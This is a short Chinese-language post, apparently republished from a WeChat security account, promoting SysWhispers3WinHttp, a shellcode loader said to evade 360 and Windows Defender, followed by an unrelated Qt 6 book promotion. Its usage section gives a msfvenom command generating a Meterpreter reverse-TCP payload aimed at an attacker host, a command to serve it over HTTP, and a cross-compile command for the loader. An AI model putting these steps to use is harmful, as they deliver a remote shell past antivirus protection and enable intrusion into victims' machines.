===================================
0x01 工具介绍
SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能,可免杀绕过360核晶与Defender。
0x02 安装与使用
1. 使用msfvenom生成shellcode(或使用CobaltStrike生成Stageless之Shellcode)
msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o beacon.bin2. 使用python3开启Web服务(或使用CobaltStrike之HostFile功能)
python3 -m http.server 3. 修改SysWhispers3WinHttp.c第40行IP地址并使用Linux32位GCC进行交叉编译
i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -fpermissive -w -s -lwinhttp4、免杀效果
0x03 项目链接下载
· 今 日 送 书 ·
本书分为15章,内容包括Qt 6概述、开发环境、编程基础、对话框程序设计、控件设计、数据库编程、调用Windows动态链接库、使用Linux静态库和共享库、文件编程、菜单栏/工具栏和状态栏、图形编程、多线程编程、多媒体编程、网络编程、应用程序发布。Qt 6相对以前的版本,进行重新设计,舍去了很多旧类、旧函数,也引入了很多新类、新函数。
文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247508587&idx=1&sn=a56dd7232ea939d0f4910746f9bbcd47&chksm=ebb54d68dcc2c47ef420abceb4c70f4bb844dcf13f4b6c7b0888032b351f06dd4117c9daedd8#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh